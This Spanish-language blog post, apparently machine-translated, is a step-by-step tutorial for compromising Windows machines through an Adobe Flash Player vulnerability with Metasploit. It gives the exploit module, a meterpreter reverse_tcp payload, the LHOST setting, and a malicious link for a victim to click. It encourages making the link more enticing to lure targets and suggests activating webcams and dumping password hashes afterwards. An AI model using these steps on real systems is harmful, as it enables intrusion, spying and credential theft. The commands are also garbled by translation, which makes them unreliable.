Hacking en Windows (XP, Vista, 7, 8, 8.1, 10)

0 Comments

Hacking en Windows (XP, Vista, 7, 8, 8.1, 10) El uso de Flash Player. 


Obten acceso a redes sociales, Facebook, INSTAGRAM, IMVU, TWITTER.


Todos los post estan hechos con fines educativos, informativos & sobre todo ético.
No me hago responsable por el mal uso que puedan darle. 
Muchos usuarios en diferentes foros o en mis grupos a menudo me hacen la misma pregunta: "¿Cuál es la el S.O más fácil de hackear?" Mi respuesta es siempre la misma, no es una plataforma, sino más bien una determinada pieza de software que es más fácil de hackear, que se encuentra en casi todos los sistemas del cliente. Ese software es Adobe Flash Player.
 
Hace unos años, Apple bastante notable, y poco elegante, prohibió el uso de Adobe Flash Player en su plataforma iOS para una serie de razones.
 
Una es que Flash Player se bugea muy a menudo y, cuando lo hace, es una pérdida de energía en el sistema. Eso es apenas perceptible si su sistema está conectado a una toma, pero degrada seriamente la experiencia de usuario si se trata de un dispositivo que utiliza principalmente una batería.
 
La segunda razón para la denegación de flash de Apple es su seguridad, o la falta de ella. Su postura de seguridad es atroz! Probablemente tiene el peor récord de seguridad de cualquier pieza ampliamente utilizado de software. 

Las vulnerabilidades se encuentran en este programa casi a diario.
 
Si me encontro con una red o una máquina que realmente necesitaba poseer, lo primero que me gustaría ver sería Adobe Flash Player.








Hacking Windows (XP, Vista, 7, 8) El uso de Flash Player

En este tutorial, vamos a ver una manera de hackear Flash Player con Metasploit que funciona en casi todas las plataformas Windows, desde XP hasta Windows 8. Este método utilizará una vulnerabilidad.
 
Flash Player es un terreno fértil para tales vulnerabilidades y explota que es digno de su tiempo y la molestia de considerar el desarrollo de su propio día cero exploit para esta aplicación mal diseñada y con problemas.

 

Paso 1: Verifique Vulnerabilidades

Vamos a empezar por mirar las vulnerabilidades conocidas en el Adobe Flash Player yendo a mi base de datos de vulnerabilidad favorita, SecurityFocus de Symantec, en el siguiente enlace.
Al abrir esta URL, vaya al proveedor y seleccione "Adobe" en el cuadro desplegable, seguido de "Flash Player" en la sección Título. Deja la sección Versión sin tocar para que nos proporciona las vulnerabilidades de Adobe Flash Player para todas las versiones.






 
 
 
 
 
 
 
 
 
 
Como se puede ver, Adobe Flash Player tiene 9 páginas de vulnerabilidades y 13 de las vulnerabilidades se han revelado en sólo el último mes. No importa cuántas veces Adobe parchea esta aplicación, las vulnerabilidades nunca paran! Ya que adobe es una de los software con más vulnerabilidades.

Paso 2: Encienda  Kali o su backtrack y Start Metasploit

 

En esta ocasión usare kali linux. 

Ahora que sabemos que Adobe Flash Player es un terreno fértil para  para hackear, vamos a lanzar hasta Kali Linux y abrirlo con Metasploit.









Ahora, vamos a usar la función de búsqueda integrada en Metasploit para encontrar Adobe hazañas. msf> buscar adobe

 
 



 
 
 
 
 
 
 
 
 
 
Como se puede ver, Metasploit ha llamado:
  • explotar / windows / browser / adobe_flash_pixel_bender_bof
Este es un relativamente nuevo en exploit, justo después de haber sido puesto en libertad el 28 de abril de 2014. Vamos a usar esa.

Paso 3: Configurar las Opciones

Para utilizar este exploit, simplemente escriba:
 
msf> uso exploit / windows / browser / abobe_flash_pixel_bender_bof
 
Ahora, vamos a echar un vistazo a este exploit utilizando el comando "info".
 
msf> Información





 
 
 
 
Tenga en cuenta que este exploit funciona en todos los sistemas operativos de Windows XP a Windows 8 con Internet Explorer 6 a 11 con Flash 11, 12 y 13. Muchas computadoras no las actualizan, lo digo por experiencia. La gente no suele actualizar su PC. Eso equivale a  un montón de sistemas vulnerables!
 
Antes de empezar nuestro exploit, vamos a comprobar para ver qué opciones tenemos que establecer.
 
Opciones msf> ver





 
 
 
 
Como se puede ver en la imagen anterior, esta explotación cuenta con numerosas opciones, pero todas ellas ya están configurados con valores por defecto.
Los dos es posible que desee cambiar (pero no está obligado) son los SVRPORT (8080) y el URIPATH. Tenga en cuenta que si no cambia el URIPATH, se establece mediante su dirección IP y una cadena aleatoria. 

Si usted está buscando  hackear a alguien con un agujero, para que haga clic en este enlace , es posible que desee hacer el URI más atractiva, mejor personalizada.

Paso 4: Configure la payload

Ahora, tenemos que establecer la carga útil que queremos ofrecer al sistema víctima. 

Lo ideal es que siempre queremos ofrecer la meterpreter, si podemos. Algunas hazañas nos permitirán entregar el meterpreter y otros no. En este caso, podemos entregar el meterpreter, así que vamos..! >:)
 
ventanas msf> conjunto de carga útil / meterpreter / reverse_tcp







 






 
Ahora, configure el host local IP (LHOST).
establecer LHOST 192.168.147.129

Paso 5: Exploit

La ejecución de este exploit es limpia y sencilla. Sólo tienes que escribir "Exploit" y se crea e inicia un servidor web y un camino hacia el código malicioso que explotará Flash Player de Adobe.






 

 

Paso 6: Ahora haremos el papel de la victima, abriendo nuestro link infectado.

Ahora, vamos a ir a nuestro equipo con Windows 7 y escriba la dirección URL de nuestro servidor web malicioso que hemos construido en Metasploit





 
 
 
Mientras que estamos haciendo eso, podemos ver en Metasploit que las cosas se están agitando. Una conexión se está estableciendo netween Windows 7 en nuestro sistema Kali Metasploit 





 
 
 
Si somos pacientes, seremos recompensados ​​con un comando meterpreter en el sistema Windows 7





 
 
 
 
¡Genial! Eres dueño de ese sistema.

Paso 7: Meterpreter

Con el meterpreter en el sistema víctima, ahora tenemos la capacidad y la posibilidad de ejecutar cualquiera de los scripts Meterpreter. 

Por ejemplo, puede activar la cámara web con webcam.rb o agarrar los hashes de contraseñas con hashdump.rb.
 
Tengo un post relacionado a todas las funciones de Meterpreter.
 
Flash Player de Adobe continúa proporcionarnos un terreno fértil para hackear Windows y otros sistemas, con su gran cantidad de vulnerabilidades. Voy a seguir para ponerle al día sobre sus otras vulnerabilidades "hackable", por lo que seguro que volveré. :D 

Suerte :) 

Exploit

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Instagram